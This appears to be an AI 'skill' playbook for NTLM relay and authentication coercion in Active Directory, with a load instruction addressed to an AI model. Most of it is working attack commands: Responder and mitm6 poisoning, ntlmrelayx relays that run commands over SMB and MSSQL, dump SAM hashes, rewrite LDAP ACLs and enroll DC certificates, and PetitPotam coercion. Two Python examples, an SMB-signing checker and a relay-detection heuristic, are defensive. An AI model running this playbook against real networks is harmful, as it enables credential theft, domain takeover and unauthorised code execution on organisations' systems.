ntlm-relay-coercion

SKILL: NTLM Relay and Authentication Coercion — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert NTLM relay and coercion techniques. Covers relay to SMB/LDAP/HTTP/MSSQL, signing requirements, Responder poisoning, mitm6, cross-protocol relay, WebDAV coercion, and all major coercion methods. Base models miss signing/EPA requirements and cross-protocol relay constraints.

0. RELATED ROUTING

Before going deep, consider loading:
  • active-directory-certificate-services for ESC8 (relay to ADCS enrollment)
  • active-directory-acl-abuse for ACL modification via LDAP relay (RBCD, shadow creds)
  • active-directory-kerberos-attacks for Kerberos attacks after relay success
  • windows-lateral-movement for post-relay lateral movement

Advanced Reference

Also load COERCION_METHODS.md when you need:
  • Detailed coercion method comparison (PetitPotam, PrinterBug, DFSCoerce, etc.)
  • RPC function-level details and prerequisites
  • Coercer tool usage and discovery

1. NTLM RELAY FUNDAMENTALS

Victim          Attacker (relay)         Target
  │                 │                      │
  │── NTLM Auth ──→│                      │  (1) Victim authenticates (coerced/poisoned)
  │                 │── Forward Auth ─────→│  (2) Attacker relays to target
  │                 │←─ Challenge ──────── │  (3) Target sends challenge
  │←─ Challenge ────│                      │  (4) Attacker forwards challenge to victim
  │── Response ────→│                      │  (5) Victim computes response
  │                 │── Forward Response ─→│  (6) Attacker relays response to target
  │                 │←─ Authenticated! ────│  (7) Target accepts → attacker has session

NTLMv1 vs NTLMv2

| Feature | NTLMv1 | NTLMv2 |
|---|---|---|
| Security | Weak (crackable to NTLM hash) | Stronger (but still relayable) |
| Relay | Yes | Yes |
| Crack to hash | Yes (rainbow tables, crack.sh) | Offline brute-force only |
| Downgrade | Force via Responder `--lm` | Default in modern Windows |

2. RELAY TARGET MATRIX

| Target Protocol | What You Get | Signing Required by Default? | EPA/Channel Binding? |
|---|---|---|---|
| SMB | Command exec (if admin), file access | DCs: Yes, Workstations: No | No |
| LDAP | ACL modification, RBCD, shadow creds, add computer | DCs: No (negotiated) | No (unless configured) |
| LDAPS | Same as LDAP but encrypted | N/A | Yes (channel binding) |
| HTTP (ADCS) | Certificate enrollment (ESC8) | No | Depends on config |
| MSSQL | SQL queries, xp_cmdshell | No | No |
| IMAP/SMTP | Email access | No | No |
| RPC | Various (CA enrollment for ESC11) | Depends | No |

Signing Check

```bash
# Check SMB signing on target
crackmapexec smb TARGET_IP --gen-relay-list relay_targets.txt
# Outputs hosts WITHOUT required SMB signing

# Nmap SMB signing check
nmap -p 445 --script smb2-security-mode TARGET_RANGE
```
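Both checks above read the same thing: the SecurityMode field of the SMB2 NEGOTIATE response, where bit 0x0002 means the server rejects unsigned sessions. The following Python is an added example, not code from this page, crackmapexec or nmap; it decodes that field from a raw NEGOTIATE response (as captured on the wire or pulled from a pcap) and classifies the host the way the relay-target matrix in §2 does. The `build_sample_response` bytes are constructed test data, not a real server capture.

```python
import struct

# SMB2 constants from MS-SMB2: protocol identifier, NEGOTIATE command, header flag, SecurityMode bits
SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED = 0x0001   # server supports signing
SIGNING_REQUIRED = 0x0002  # server rejects unsigned sessions

DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}


def parse_smb2_negotiate_response(data: bytes) -> dict:
    """Decode dialect and SecurityMode from a raw SMB2 NEGOTIATE response."""
    # Strip the 4-byte NetBIOS session service header if the capture includes it
    if len(data) >= 4 and data[0] == 0x00:
        length = int.from_bytes(data[1:4], "big")
        data = data[4:4 + length]
    if len(data) < 64 + 65 or data[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    # SMB2 header: StructureSize at offset 4, Command at 12, Flags at 16
    struct_size, = struct.unpack_from("<H", data, 4)
    command, = struct.unpack_from("<H", data, 12)
    flags, = struct.unpack_from("<I", data, 16)
    if struct_size != 64 or command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    # NEGOTIATE response body starts at offset 64: StructureSize(2) SecurityMode(2) DialectRevision(2)
    body_size, security_mode, dialect = struct.unpack_from("<HHH", data, 64)
    if body_size != 65:
        raise ValueError("unexpected NEGOTIATE response structure size")
    return {
        "dialect": DIALECTS.get(dialect, hex(dialect)),
        "signing_enabled": bool(security_mode & SIGNING_ENABLED),
        "signing_required": bool(security_mode & SIGNING_REQUIRED),
    }


def relay_exposure(info: dict) -> str:
    """Map SecurityMode onto the relay-target matrix: a relayed session cannot be
    signed by the relay, so only SIGNING_REQUIRED takes the host off the target list."""
    if info["signing_required"]:
        return "protected (signing required)"
    if info["signing_enabled"]:
        return "relayable (signing supported but not required)"
    return "relayable (signing not supported)"


def build_sample_response(security_mode: int, dialect: int) -> bytes:
    """Constructed NEGOTIATE response for offline testing (not a real server capture)."""
    header = SMB2_MAGIC + struct.pack("<HHIHHI", 64, 0, 0, SMB2_NEGOTIATE, 1,
                                      SMB2_FLAGS_SERVER_TO_REDIR) + bytes(44)
    body = (struct.pack("<HHHH", 65, security_mode, dialect, 0)      # size, mode, dialect, reserved
            + bytes(16)                                              # ServerGuid
            + struct.pack("<IIII", 0, 0x800000, 0x800000, 0x800000)  # Capabilities, max sizes
            + bytes(16)                                              # SystemTime, ServerStartTime
            + struct.pack("<HHI", 0, 0, 0)                           # security buffer, context offset
            + b"\x00")                                               # variable-length buffer
    message = header + body
    return b"\x00" + len(message).to_bytes(3, "big") + message


if __name__ == "__main__":
    # Constructed examples: a hardened DC and a default-configuration workstation
    for label, mode, dialect in (("dc01", SIGNING_ENABLED | SIGNING_REQUIRED, 0x0311),
                                 ("wks07", SIGNING_ENABLED, 0x0210)):
        info = parse_smb2_negotiate_response(build_sample_response(mode, dialect))
        print(f"{label}: SMB {info['dialect']} -> {relay_exposure(info)}")
```

The "signing supported but not required" result is the common workstation case from the matrix: the server will sign if the client asks, but an attacker-relayed session simply does not ask, so for relay purposes it is equivalent to no signing at all.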

---

3. RESPONDER — CREDENTIAL CAPTURE

LLMNR/NBT-NS/WPAD/mDNS Poisoning

```bash
# Start Responder (capture mode — don't relay, just capture hashes)
responder -I eth0 -dwP

# Analyze mode (passive, no poisoning)
responder -I eth0 -A
```

Key protocols poisoned:
  • LLMNR (UDP 5355) — Link-Local Multicast Name Resolution
  • NBT-NS (UDP 137) — NetBIOS Name Service
  • WPAD — Web Proxy Auto-Discovery (proxy config)
  • mDNS (UDP 5353) — Multicast DNS

Responder + Relay (Don't Capture, Relay Instead)

```bash
# Disable HTTP and SMB servers in Responder (ntlmrelayx will handle them)
# Edit /etc/responder/Responder.conf: set HTTP and SMB to Off

# Start Responder for poisoning only
responder -I eth0 -dwP

# Start ntlmrelayx for relay
ntlmrelayx.py -tf targets.txt -smb2support
```

---

4. NTLMRELAYX — RELAY EXECUTION

Relay to SMB (Admin Execution)

```bash
# Execute command on targets (requires admin privs on target)
ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"

# Dump SAM hashes
ntlmrelayx.py -tf targets.txt -smb2support

# Interactive SOCKS proxy (maintain sessions)
ntlmrelayx.py -tf targets.txt -smb2support -socks
# Then: proxychains smbclient //TARGET/C$ -U DOMAIN/user
```

Relay to LDAP (ACL Modification)

```bash
# Automatic RBCD (delegate-access)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

# Escalate via shadow credentials
ntlmrelayx.py -t ldap://DC_IP --shadow-credentials -smb2support

# Add computer account
ntlmrelayx.py -t ldap://DC_IP --add-computer FAKE01 P@ss123 -smb2support

# Dump domain info
ntlmrelayx.py -t ldap://DC_IP -smb2support --dump-domain
```

Relay to ADCS HTTP (ESC8)

```bash
ntlmrelayx.py -t http://CA_HOST/certsrv/certfnsh.asp -smb2support \
  --adcs --template DomainController
# Use with coercion to relay DC auth → get DC certificate
```

Relay to MSSQL

```bash
ntlmrelayx.py -t mssql://SQL_HOST -smb2support -q "SELECT system_user; EXEC xp_cmdshell 'whoami'"
```

5. MITM6 — IPv6 DNS TAKEOVER

```bash
# mitm6 exploits IPv6 auto-configuration to become DNS server
mitm6 -d domain.com

# Combined with ntlmrelayx
ntlmrelayx.py -6 -t ldap://DC_IP -wh fake-wpad.domain.com --delegate-access -smb2support
```

Flow:
  1. mitm6 sends DHCPv6 replies → victim gets attacker as IPv6 DNS
  2. Victim queries WPAD → attacker responds
  3. NTLM auth triggered → relayed to LDAP
  4. RBCD or shadow credentials set on victim computer


---

6. CROSS-PROTOCOL RELAY

SMB → LDAP

Capture SMB authentication, relay to LDAP (requires no LDAP signing enforcement).

```bash
# Coerce SMB auth from DC, relay to LDAP on same or different DC
ntlmrelayx.py -t ldap://DC02_IP --delegate-access -smb2support

# Trigger coercion (attacker receives SMB auth)
PetitPotam.py ATTACKER_IP DC01_IP
```

**Limitation**: SMB → LDAP relay fails when the SMB client sets the signing flag in its NTLM NEGOTIATE message (Windows SMB clients do so by default): the LDAP server then expects a signed session, which the relay cannot produce.

WebDAV → LDAP

WebDAV from workstations sends NTLM over HTTP → relay to LDAP (no signing issues).

```bash
# WebDAV coercion sends HTTP-based NTLM (no SMB signing concern)
ntlmrelayx.py -t ldap://DC_IP --delegate-access -smb2support

# Coerce via WebDAV (workstation must have WebClient service running)
# Use @ATTACKER_PORT format to force WebDAV
PetitPotam.py ATTACKER@80/test WORKSTATION_IP
```
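Both cross-protocol cases above leave the same trace at the relay target: an NTLM network logon whose WorkstationName says one host while the TCP source address is another (the relay), and in the DC-coercion case a machine account (DC01$) arriving from an address that is not DC01. The Python below is an added detection example, not from this page or any tool it names; it runs that heuristic over Security event 4624 fields. The key=value line format, the log lines and the hostname-to-IP inventory are all constructed test data.

```python
import re

# Constructed 4624 excerpts (fields flattened to key=value; not real logs).
SAMPLE_EVENTS = [
    "EventID=4624 Computer=FS01.corp.local TargetUserName=alice WorkstationName=WKS07 "
    "IpAddress=10.0.1.17 LogonType=3 AuthenticationPackageName=NTLM",
    # DC01's machine account reaches DC02 over NTLM from an address that is not DC01:
    # the trace of coercing DC01 and relaying its authentication elsewhere.
    "EventID=4624 Computer=DC02.corp.local TargetUserName=DC01$ WorkstationName=DC01 "
    "IpAddress=10.0.9.200 LogonType=3 AuthenticationPackageName=NTLM",
    # Claims WKS07 but the TCP source is another host: a relayed user credential.
    "EventID=4624 Computer=FS01.corp.local TargetUserName=bob WorkstationName=WKS07 "
    "IpAddress=10.0.9.200 LogonType=3 AuthenticationPackageName=NTLM",
    # Kerberos logon: out of scope for an NTLM relay heuristic.
    "EventID=4624 Computer=FS01.corp.local TargetUserName=carol WorkstationName=WKS08 "
    "IpAddress=10.0.1.18 LogonType=3 AuthenticationPackageName=Kerberos",
]

# Constructed asset inventory: hostname -> the IPv4 address it should authenticate from.
HOST_TO_IP = {"WKS07": "10.0.1.17", "WKS08": "10.0.1.18", "DC01": "10.0.0.10", "DC02": "10.0.0.11"}

FIELD = re.compile(r"(\w+)=(\S+)")


def parse_event(line: str) -> dict:
    """Turn one flattened key=value event line into a dict."""
    return dict(FIELD.findall(line))


def relay_indicators(events, host_to_ip) -> list:
    """Flag NTLM network logons whose claimed origin host does not match the observed source IP."""
    findings = []
    for line in events:
        ev = parse_event(line)
        if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
            continue  # only network logons are relay candidates
        if ev.get("AuthenticationPackageName") != "NTLM":
            continue  # Kerberos cannot be relayed this way
        workstation = ev.get("WorkstationName", "").upper()
        source_ip = ev.get("IpAddress", "")
        user = ev.get("TargetUserName", "")
        expected_ip = host_to_ip.get(workstation)
        if expected_ip is None:
            continue  # no baseline for this name; tune the inventory rather than guess
        if source_ip == expected_ip:
            continue
        if user.endswith("$"):
            reason = "machine account authenticating from a foreign address (coercion + relay)"
        else:
            reason = "workstation name / source IP mismatch (relayed NTLM)"
        findings.append({"target": ev.get("Computer", ""), "user": user, "claimed": workstation,
                         "seen_from": source_ip, "reason": reason})
    return findings


if __name__ == "__main__":
    for f in relay_indicators(SAMPLE_EVENTS, HOST_TO_IP):
        print(f"{f['target']}: {f['user']} claimed {f['claimed']} but came from {f['seen_from']} "
              f"-> {f['reason']}")
```

The heuristic needs a trustworthy name-to-address baseline; NAT, VPN pools and multi-homed hosts produce legitimate mismatches, so tune the inventory before alerting on it. The machine-account branch is the higher-signal one, since a DC's account should never perform an NTLM network logon from anywhere but the DC itself.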

---

7. WEBDAV-BASED COERCION

WebClient service (WebDAV) converts SMB-type coercion to HTTP-based NTLM.

```bash
# Check if WebClient is running (port 80 listener or service query)
crackmapexec smb TARGET -u user -p pass -M webdav

# Start WebDAV coercion (from workstation, not server)
# Force target to authenticate via HTTP:
# Use UNC path format: \\ATTACKER@PORT\share
```

**Key advantage**: HTTP-based NTLM avoids SMB signing requirements.

---

8. NTLM RELAY DECISION TREE

8. NTLM中继决策树

Want to relay NTLM authentication
├── What auth can you capture?
│   ├── Responder poisoning (passive, wait for queries)
│   ├── mitm6 (DHCPv6 DNS takeover, periodic)
│   └── Active coercion → load COERCION_METHODS.md
├── What target to relay to?
│   │
│   ├── Need code execution?
│   │   ├── SMB target without signing → ntlmrelayx to SMB (§4)
│   │   └── MSSQL target → ntlmrelayx to MSSQL + xp_cmdshell (§4)
│   │
│   ├── Need domain escalation?
│   │   ├── LDAP signing not enforced?
│   │   │   ├── Relay to LDAP → RBCD (§4)
│   │   │   ├── Relay to LDAP → shadow credentials (§4)
│   │   │   └── Relay to LDAP → add computer + delegate (§4)
│   │   └── LDAP signing enforced?
│   │       └── Relay to ADCS HTTP (ESC8) → certificate (§4)
│   │
│   └── Need certificate?
│       └── Relay to ADCS HTTP/RPC → ESC8/ESC11 (§4)
├── Source is SMB-based?
│   ├── Target is SMB → check signing (§2)
│   ├── Target is LDAP → may work (cross-protocol, §6)
│   └── Target is HTTP → works (cross-protocol)
├── Source is HTTP-based (WebDAV)?
│   └── Relay to any target (no signing issues, §6/§7)
└── Relay fails?
    ├── Check signing requirements (§2)
    ├── Check EPA/channel binding
    ├── Try cross-protocol (SMB → LDAP)
    └── Try WebDAV coercion (avoids SMB signing)